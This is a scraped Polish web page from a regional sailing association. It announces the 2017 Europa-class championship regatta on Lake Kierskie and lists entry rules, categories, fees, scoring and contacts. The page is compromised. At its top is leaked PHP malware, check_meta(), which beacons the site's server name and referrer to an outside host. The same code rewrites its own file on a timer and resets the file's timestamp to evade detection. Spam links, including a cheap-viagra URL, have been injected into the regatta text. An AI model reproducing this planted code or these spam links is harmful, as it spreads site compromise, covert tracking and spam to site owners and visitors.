check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Informacje Sportowe

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Informacje Sportowe

 

UWAGA!!!

REGATY Z CYKLU MISTRZOSTWA WOJEWÓDZTWA

WIELKOPOLSKIEGO W KLASIE EUROPA

ODBĘDĄ SIĘ W KIEKRZU RAZEM Z REGATAMI

MISTRZOSTWA POLSKI MASTERSÓW 30.09-01.10.2017 zawiadomienie [PDF]

 

 

 

 

ZAWIADOMIENIE O REGATACH [PDF]

Nazwa regat:

MISTRZOSTW WOJEWÓDZTWA WIELKOPOLSKIEGO W ŻEGLARSTWIE KLASY EUROPA

Termin:

30.09-1.102017

Miejsce regat:

Poznań - Kiekrz - Jezioro Kierskie

Organizator:

Wielkopolski Okręgowy Związek Żeglarski oraz Żeglarski Ludowy Klub Sportowy

ul. Wilków Morskich 2, 60-480 Poznań.

Regaty będą rozegrane na jeziorze Kierskim w dniach 30.09-1.10.2017

Przepisy:

Regaty zostaną rozegrane zgodnie z przepisami zdefiniowanymi w ‘Przepisach Regatowych

Żeglarstwa’ World Sailing’ 2017-2021.

- przepisami PZŻ.

- przepisami klasowymi.

- instrukcją żeglugi.

- niniejszym zawiadomieniem o regatach.

Zgłoszenia:

W regatach uczestniczą zawodnicy zgłoszeni przez kluby żeglarskie, będące członkami PZŻ.

Zawodnicy zgłaszani do www.jbrcnj.org regat muszą posiadać:

- licencje zawodnika PZŻ

- ubezpieczenie OC

- aktualną kartę zdrowia

- certyfikat jachtu;

- zgoda PZŻ na reklamowanie indywidualne.

Zgłoszenia będą przyjmowane przez stronę internetowym pod adresem: ZGŁOSZENIA MISTRZOSTWA

WLKP 2017 do dnia 29.09.2017 biurze regat na przystani organizatora w dniu 30.09.2017 w godzinach od 09:00 do10.00

Kategorie:

Regaty zostaną rozegrane według klasyfikacji:

EUROPA U20 KOBIET

EUROPA U20 MĘŻCZYŹNI

EUROPA KOBIET

EUROPA MĘŻCZYŹNI

Warunkiem utworzenia klasyfikacji jest zgłoszenie co najmniej trzech zawodników w poszczególnej kategorii.

Program regat:

Sobota:

30.09.17 -9.00-10.00 -zgłoszenia do regat

11.00 -gotowość startowa.

Niedziela:

1.10.17 -11.00 -gotowość startowa.

16.00 -zakończenie regat 1.10

Wpisowe do regat:

40PLN juniorzy

60PLN seniorzy

Reklamowanie:

Obowiązują wymagania Zarządzenia 20 ISAF Kodeks reklamowania.

Instrukcja żeglugi:

Instrukcja żeglugi zostanie ogłoszona w dniu przyjmowania zgłoszeń do regat.

Trasy:

Trasy wyścigów określi Instrukcja Żeglugi

Punktacja:

W regatach stosowany będzie system małych punktów.

Planowane jest rozegranie 7 wyścigów.

Regaty zostaną uznane za http://pozz.poznan.pl/where-to-get-viagra-cheap ważne przy rozegraniu 3 wyścigów. Rezultat najgorszego

wyścigu będzie odrzucany przy rozegraniu minimum 4 wyścigów.

Regaty zostaną uznane za ważne przy zgłoszeniu minimum 3 jachtów z danej klasy.

Nagrody:

Trzy najlepsze załogi w każdej klasie otrzymają medale, dyplomy oraz drobne upominki.

Odpowiedzialność :

Zawodnicy biorą udział w regatach na własne ryzyko i odpowiedzialność.

Organizator nie ponosi odpowiedzialności za szkody osobowe i materialne przez siebie nie

zawinione.

Zabezpieczenie trasy:

Wszystkie łodzie asekuracyjne muszą posiadać akredytację otrzymaną przez organizatora.

Prawo do wizerunku:

Zgłaszając się do regat, zawodnik wyraża zgodę na bezpłatne wykorzystywanie swego

wizerunku przez organizatorów i sponsorów w formie fotografii, filmów i innych materiałów

tworzonych w trakcie trwania regat i ich reprodukcji we wszystkich materiałach dotyczących

regat.

Osoby kontaktowe:

Sławomir Kaczmarek 601701067 Adres poczty elektronicznej jest chroniony przed robotami spamującymi. W przeglądarce musi być włączona obsługa JavaScript, żeby go zobaczyć.

Mieczysław Popłonyk 502274996 Adres poczty elektronicznej jest chroniony przed robotami spamującymi. W przeglądarce musi być włączona obsługa JavaScript, żeby go zobaczyć.